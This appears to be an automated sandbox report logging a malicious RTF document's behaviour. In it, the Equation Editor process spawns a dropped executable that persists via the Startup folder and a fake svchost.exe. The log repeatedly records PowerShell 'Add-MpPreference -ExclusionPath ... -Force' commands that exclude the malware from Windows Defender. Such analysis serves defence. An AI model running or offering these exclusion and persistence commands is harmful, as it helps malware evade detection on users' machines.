                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.........'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................h...............................0.......w.........................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................0.......................l.........'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......L.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`...............................0.................................'.............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................0.................................'.............
                      Source: C:\Users\user\AppData\Roaming\srt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: order-confirmation.doc__.rtfReversingLabs: Detection: 40%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: unknownProcess created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\srt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
